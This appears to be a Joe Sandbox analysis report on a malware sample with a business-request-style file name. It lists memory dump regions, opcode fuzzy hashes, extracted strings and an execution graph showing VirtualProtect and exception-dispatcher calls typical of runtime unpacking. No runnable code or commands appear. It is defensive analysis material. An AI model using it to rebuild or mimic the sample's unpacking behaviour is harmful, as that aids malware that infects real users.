                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 6321bb7ae282fff8a3bb4db2ba4b7f8d6e9c51249b83fe278968c580adbbf716
                                                                                                                                                    • Instruction ID: 40f104257d96e3669ca66957c7930e63215bd337c6bb7c71b6efc4d2fce32cde
                                                                                                                                                    • Opcode Fuzzy Hash: 6321bb7ae282fff8a3bb4db2ba4b7f8d6e9c51249b83fe278968c580adbbf716
                                                                                                                                                    • Instruction Fuzzy Hash: 13513370E0620CCFDB14DFA9E5447EDBBF2EB89300F15A129DA19AB254DB745A46CF40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e2dfccf9ab6d0fe2cacbe0f52bbab0ade315af31e7700dd04f83789dceb16694
                                                                                                                                                    • Instruction ID: b659df92e973d868070fd8527490c1254fcf055076dcd4f05b19394b67a54d24
                                                                                                                                                    • Opcode Fuzzy Hash: e2dfccf9ab6d0fe2cacbe0f52bbab0ade315af31e7700dd04f83789dceb16694
                                                                                                                                                    • Instruction Fuzzy Hash: 58515470E06208CFDB14DFA9E5447EDBBF2FB89304F14A529D929AB294DB745A46CF00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359111117.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_4c80000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e1e366d8d98ba262c84c10fd3be348a2939fea212d957f53f0abe15b74add075
                                                                                                                                                    • Instruction ID: 50ca4f72041a20dbd6b2c27673b3c9c3528436aa4d3615788735611b44f6d969
                                                                                                                                                    • Opcode Fuzzy Hash: e1e366d8d98ba262c84c10fd3be348a2939fea212d957f53f0abe15b74add075
                                                                                                                                                    • Instruction Fuzzy Hash: C9518D71D056588BE71DCF6B8C412CAFBF3AFC9344F15C0FA954CAA225EB7409868E11
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0877e3648fef5e87c23e7c1bfba386cce17cc897c346169d85578166818629d6
                                                                                                                                                    • Instruction ID: afcd2329fcb64571873d01fcb148e070ae5ac4a1b3e6be466bfd7c1f75f68430
                                                                                                                                                    • Opcode Fuzzy Hash: 0877e3648fef5e87c23e7c1bfba386cce17cc897c346169d85578166818629d6
                                                                                                                                                    • Instruction Fuzzy Hash: 515166B1E016198BDB18CFABD95069EFBF3BFC8300F14C07AD548AB268DB7459468B54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359111117.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_4c80000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 736be4679f16de4c01118b76784c14b72ee998f762d063641500f80ef56c802f
                                                                                                                                                    • Instruction ID: 82922bf21d62b3485594c97f518edd2337ccfb022d238f67bd225c86a569cadb
                                                                                                                                                    • Opcode Fuzzy Hash: 736be4679f16de4c01118b76784c14b72ee998f762d063641500f80ef56c802f
                                                                                                                                                    • Instruction Fuzzy Hash: 8C513E71E016588BEB6CCF5B8D446CAFAF3AFC8301F14C1FA994CA6254EB701AC58E41
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359111117.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_4c80000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e50d5be6903af1a4e402f17ca700ad242dee73625ee1e97d4262a4ac569b317e
                                                                                                                                                    • Instruction ID: 6c391067cc61e323231272bccd3ad83b07bbbecdc51bba45fd731470eaf01262
                                                                                                                                                    • Opcode Fuzzy Hash: e50d5be6903af1a4e402f17ca700ad242dee73625ee1e97d4262a4ac569b317e
                                                                                                                                                    • Instruction Fuzzy Hash: 0241E0B4D043489FDB10DFA9D884BAEBBF2AB49304F209029E816A7290D774A945CF45
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356459108.0000000001F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F00000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f00000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9d1a9e4351039a74202b17def11462c1afde33036ff3ba1c329c051cf19ca0a7
                                                                                                                                                    • Instruction ID: 4d92d47cd4f6116c574a484a4245b8a17dada588eb1f129d8f86298f0a72e579
                                                                                                                                                    • Opcode Fuzzy Hash: 9d1a9e4351039a74202b17def11462c1afde33036ff3ba1c329c051cf19ca0a7
                                                                                                                                                    • Instruction Fuzzy Hash: C941FEB5D002589FCF10CFA9D484AEEFBF0AF49350F24942AE415B7250D3789A89CF64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356459108.0000000001F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F00000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f00000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8220704fce13270a57f8bbf6d8bae781b802cd1e3f20be98a2a03a20ac47ab50
                                                                                                                                                    • Instruction ID: d09ef458d3032bfdfab259532097dd7c4adabfebbe9bef77cc0ae1cebe0cb947
                                                                                                                                                    • Opcode Fuzzy Hash: 8220704fce13270a57f8bbf6d8bae781b802cd1e3f20be98a2a03a20ac47ab50
                                                                                                                                                    • Instruction Fuzzy Hash: DC41EEB5D002589FCF10CFA9D484AEEFBF0AF49314F24946AE415B7250D778AA89CF64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 06aa12fa02df695ad36b1c11f64f895941afa71c7e7ea443d9a391161a71f2b1
                                                                                                                                                    • Instruction ID: 0afa92c76bc0e6281d7c3778b8b38c8b9ae605f75b67af3432320dcc5fd57403
                                                                                                                                                    • Opcode Fuzzy Hash: 06aa12fa02df695ad36b1c11f64f895941afa71c7e7ea443d9a391161a71f2b1
                                                                                                                                                    • Instruction Fuzzy Hash: 1541C870D05629DBEB68CF5AC84879AFAF6BB89300F14C1EAD80CA6254DB704A858F41
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5b9f654b43f58bf67aecc565993fbfef11dbdb01caeefb6aea8bfc1941600f7e
                                                                                                                                                    • Instruction ID: a752fcdc8915e31a79ff9700ea85e487aa960472110e4cbba84674db336aa1e5
                                                                                                                                                    • Opcode Fuzzy Hash: 5b9f654b43f58bf67aecc565993fbfef11dbdb01caeefb6aea8bfc1941600f7e
                                                                                                                                                    • Instruction Fuzzy Hash: CD313D71D097949FE72ACF2AC84438ABBF7AF85300F05C0EAD4089A266EB740D85CF11
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 504da7b81d59bd8b594f04f98e326c5fe4926977ffc40f4c1f6803494127db1e
                                                                                                                                                    • Instruction ID: 2ecd26f1725e16a2326bfbdf209916d55863c6e339e8b877c07e3ec9295fe119
                                                                                                                                                    • Opcode Fuzzy Hash: 504da7b81d59bd8b594f04f98e326c5fe4926977ffc40f4c1f6803494127db1e
                                                                                                                                                    • Instruction Fuzzy Hash: CB316E71E056598BEB5DCF6B884529AFBF7AFC9300F14C1FA840CA6264DB350A818F51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 68fd60bc6352d871ae71549bade07b33d097270a79d3599d24259a6bf6a88f12
                                                                                                                                                    • Instruction ID: fedcfd5fc4c49267043f7254dfe500e8b324462d0955e9bdf44d3a9ce3d6db37
                                                                                                                                                    • Opcode Fuzzy Hash: 68fd60bc6352d871ae71549bade07b33d097270a79d3599d24259a6bf6a88f12
                                                                                                                                                    • Instruction Fuzzy Hash: 8221BD72E056188BEB18CF6BDD012DDFAF7AFC9310F14C0BAC548A6218DB710A858F55
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f90144cc8e25a28e8945692f14a7720fde9b9b6193e67d1ba612e225bcc54677
                                                                                                                                                    • Instruction ID: 230882ea41707b1ce254eed93d3a89d8ff2eaca360b9d33579009e2a84a5b0b6
                                                                                                                                                    • Opcode Fuzzy Hash: f90144cc8e25a28e8945692f14a7720fde9b9b6193e67d1ba612e225bcc54677
                                                                                                                                                    • Instruction Fuzzy Hash: 3921EF72E016188BEB1CCF6BD9002D9FAF3BFC9310F14C1BAC54966259DB710A858F44
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356349308.0000000001E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E60000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1e60000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 0<>$0<>$0<>$0<>$0<>$0<>$0<>$0<>$0<>$0<>$0<>$0<>$4'p$4'p
                                                                                                                                                    • API String ID: 0-1721806270
                                                                                                                                                    • Opcode ID: 6cf2229f1729b9f431427beef7fbd88ae66d0ee4ca0df11fbdc5db22089f69b8
                                                                                                                                                    • Instruction ID: f48ce9005ca5b4074595b70827b402dd757d2e484613bac1be1def1a54f7a67b
                                                                                                                                                    • Opcode Fuzzy Hash: 6cf2229f1729b9f431427beef7fbd88ae66d0ee4ca0df11fbdc5db22089f69b8
                                                                                                                                                    • Instruction Fuzzy Hash: 9CE1E634D00258DFCB2ADFA9E498AECBBB6FF89305F609169E416B7294DB305945CF40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356349308.0000000001E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E60000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1e60000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (E>$(E>$4'p$4'p$\C>$\C>$xD>$xD>
                                                                                                                                                    • API String ID: 0-511514871
                                                                                                                                                    • Opcode ID: 8af1269dd1dc4ebd48e4f4893af7e03c7670562b4adb29c8a7cfcb3c6f5acd1a
                                                                                                                                                    • Instruction ID: 8253774896fcf56d6e9bd402ddf4b466d750ff698501256a0946ee53418e5e93
                                                                                                                                                    • Opcode Fuzzy Hash: 8af1269dd1dc4ebd48e4f4893af7e03c7670562b4adb29c8a7cfcb3c6f5acd1a
                                                                                                                                                    • Instruction Fuzzy Hash: DFC1D434E0024ACFDB19DFA9C458AEDBBB6FF48345F509129D6126B294CB345D82CF51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (p$4'p$4'p$4'p$4'p$pp
                                                                                                                                                    • API String ID: 0-2991777393
                                                                                                                                                    • Opcode ID: 4609c5cb8178907c627461ac59cc19c30dff47742564f51bec87d94c369c319e
                                                                                                                                                    • Instruction ID: 4cf90ffd1ebf30b04a2de4b532134a702419792d44ec0734c0040ad1c2b2d0b6
                                                                                                                                                    • Opcode Fuzzy Hash: 4609c5cb8178907c627461ac59cc19c30dff47742564f51bec87d94c369c319e
                                                                                                                                                    • Instruction Fuzzy Hash: 5E51D071A003059FDB19EB7CC8117AEBAA7AFC4300F58892DD44A9B399DF359D0687A1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (_p$(_p$(_p$(_p
                                                                                                                                                    • API String ID: 0-1436489877
                                                                                                                                                    • Opcode ID: 80d854824ec60e26fb6c023703939a2e03e9cf9327c4994278ed6c1f6b6f2050
                                                                                                                                                    • Instruction ID: c4fa760dd28dbd3d34470149baa9d29c745fd67bb67fc34543840f3760ba5f0d
                                                                                                                                                    • Opcode Fuzzy Hash: 80d854824ec60e26fb6c023703939a2e03e9cf9327c4994278ed6c1f6b6f2050
                                                                                                                                                    • Instruction Fuzzy Hash: D361D070B00306CFCB14AF78C4544ADBBF2AF86314B55956DDA069B3A5EB35DC82CB81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:10.2%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                    Total number of Nodes:32
                                                                                                                                                    Total number of Limit Nodes:1
                                                                                                                                                    execution_graph 61852 4dcf6a8 61853 4dcf6ce 61852->61853 61855 4dcf8e0 61852->61855 61854 4dcf8c3 KiUserExceptionDispatcher 61853->61854 61854->61855 61817 1e0f58 61818 1e0f6c 61817->61818 61821 1e5845 61817->61821 61824 1e4cf0 61817->61824 61828 1e9110 61821->61828 61827 1e9110 VirtualProtect 61824->61827 61825 1e46ea 61825->61824 61826 1e4d11 61825->61826 61827->61825 61830 1e9123 61828->61830 61832 1e91c0 61830->61832 61833 1e9208 VirtualProtect 61832->61833 61835 1e5864 61833->61835 61836 4dc7c16 61837 4dc7c1f 61836->61837 61838 4dc7c11 61837->61838 61840 4dc8c0a 61837->61840 61838->61838 61841 4dc8c10 61840->61841 61844 b28000 61840->61844 61848 b27ff0 61840->61848 61841->61838 61845 b28008 61844->61845 61846 b280d6 KiUserExceptionDispatcher 61845->61846 61847 b28020 61846->61847 61847->61841 61849 b28008 61848->61849 61850 b280d6 KiUserExceptionDispatcher 61849->61850 61851 b28020 61850->61851 61851->61841 61813 1e9390 61814 1e93d0 CloseHandle 61813->61814 61816 1e9401 61814->61816
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ,DR$,DR$,DR$,p$4$8xR$8xR$$p$$p$$p$$p$$p$$p$$p$$p$$p$$p
                                                                                                                                                    • API String ID: 0-2087169039
                                                                                                                                                    • Opcode ID: e5a75082040d78fc575dc543744b86ca7a1d09f99ca32df87728da8d4a7781c5
                                                                                                                                                    • Instruction ID: d19b275e9a1c3eb325cb56d2e92e011882f4161c1c3544b4d476f80b47b30be6
                                                                                                                                                    • Opcode Fuzzy Hash: e5a75082040d78fc575dc543744b86ca7a1d09f99ca32df87728da8d4a7781c5
                                                                                                                                                    • Instruction Fuzzy Hash: 2AB21874A40218DFDB28DFA4D894BAEB7B6BF88300F148599E505AB3A5DB70ED41CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ,DR$,DR$,DR$,p$4$$p$$p$$p$$p
                                                                                                                                                    • API String ID: 0-2211858201
                                                                                                                                                    • Opcode ID: 7358fd1a92390b168cd487323e76de6e2f127d11510db41406ee8851247dddc5
                                                                                                                                                    • Instruction ID: d5be2c872d7ee0a0962a61cbb353dabb354e24d079ef580315e121e5a4d600ed
                                                                                                                                                    • Opcode Fuzzy Hash: 7358fd1a92390b168cd487323e76de6e2f127d11510db41406ee8851247dddc5
                                                                                                                                                    • Instruction Fuzzy Hash: FD220B74A40214CFDB28DF64D884BAEB7B2FF88304F148199E509AB3A5DB709D86CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (_p$,DR$Plp$$p
                                                                                                                                                    • API String ID: 0-4090216785
                                                                                                                                                    • Opcode ID: 45bb6f30e49beb96c40bc6c84fe30b0973ac7b0f46de0c09ca1bf4a61f90846e
                                                                                                                                                    • Instruction ID: 61fc9c046cc48cb09b9738002d8df0c54ba17a417bd99f79643d9fc81b3d0bca
                                                                                                                                                    • Opcode Fuzzy Hash: 45bb6f30e49beb96c40bc6c84fe30b0973ac7b0f46de0c09ca1bf4a61f90846e
                                                                                                                                                    • Instruction Fuzzy Hash: 6D424934B406058FDB18DF28C894AAEBBE3AF85310F6584A9D446CB3B5DB35EC42CB51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (p
                                                                                                                                                    • API String ID: 0-4175582459
                                                                                                                                                    • Opcode ID: e036d4a049212d8bb944be5bd7b694f27ec839cd34787662bce6bc07d8d8ad9f
                                                                                                                                                    • Instruction ID: 2eb46e187bd2b7c7517f9a34cbe328752562a526647371671a0257ec7876e30b
                                                                                                                                                    • Opcode Fuzzy Hash: e036d4a049212d8bb944be5bd7b694f27ec839cd34787662bce6bc07d8d8ad9f
                                                                                                                                                    • Instruction Fuzzy Hash: D7528974A007159FCB15CF68C894AAEFBF2FF88300F28852AD556D7391DB34A946CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9d92ea14b3a84b557c8cc32847594a0edbe4fc6e6fab1748175df01e6540dfc7
                                                                                                                                                    • Instruction ID: 7e2727a00c72359118302481b83bc27ed1684b6b63279e5ebefb17bcede355a1
                                                                                                                                                    • Opcode Fuzzy Hash: 9d92ea14b3a84b557c8cc32847594a0edbe4fc6e6fab1748175df01e6540dfc7
                                                                                                                                                    • Instruction Fuzzy Hash: 7D916831B04205CFEB14DF66E898BADB7B2FB88305F29D0B5D505AB298D734B985CB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4f375bf42e16f1f49646891cfee39240d0e9bf4555824a508ad2f9b0925f5c3f
                                                                                                                                                    • Instruction ID: 0b54aacdf9511fff9fc89879febb290915444d79b7786a9a1fcacf6ebae238dd
                                                                                                                                                    • Opcode Fuzzy Hash: 4f375bf42e16f1f49646891cfee39240d0e9bf4555824a508ad2f9b0925f5c3f
                                                                                                                                                    • Instruction Fuzzy Hash: 7F6101347017460BD7662A7598A437F6AA79FE6701F0C443FE602C73D2CEBC8E466289
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 154d38b4280c93ff2383cd52d34ef2a2d971ab2ac95101e532df372351f884a6
                                                                                                                                                    • Instruction ID: 2df2132f90b784e5cf74411223f9741f801f918db2f10557a0755f38bfde7407
                                                                                                                                                    • Opcode Fuzzy Hash: 154d38b4280c93ff2383cd52d34ef2a2d971ab2ac95101e532df372351f884a6
                                                                                                                                                    • Instruction Fuzzy Hash: B351F135701A0607D7692A6598A437FA5979FE5702F0C443EEB02973D2CEBD8E862289
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9e78dd6c0543a4c215b9a6b917e1844b2f5846c243edc5a7004606b4f15ffa38
                                                                                                                                                    • Instruction ID: 2244c9c227bbbe0c54bcb6c6ca74aef3701b862395dc344462832be52ecfba0f
                                                                                                                                                    • Opcode Fuzzy Hash: 9e78dd6c0543a4c215b9a6b917e1844b2f5846c243edc5a7004606b4f15ffa38
                                                                                                                                                    • Instruction Fuzzy Hash: 5F914B70A05248DFCB44EFA9E859BAEB7F1FF48304F5084A9D4069B395DB35AA85CF40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
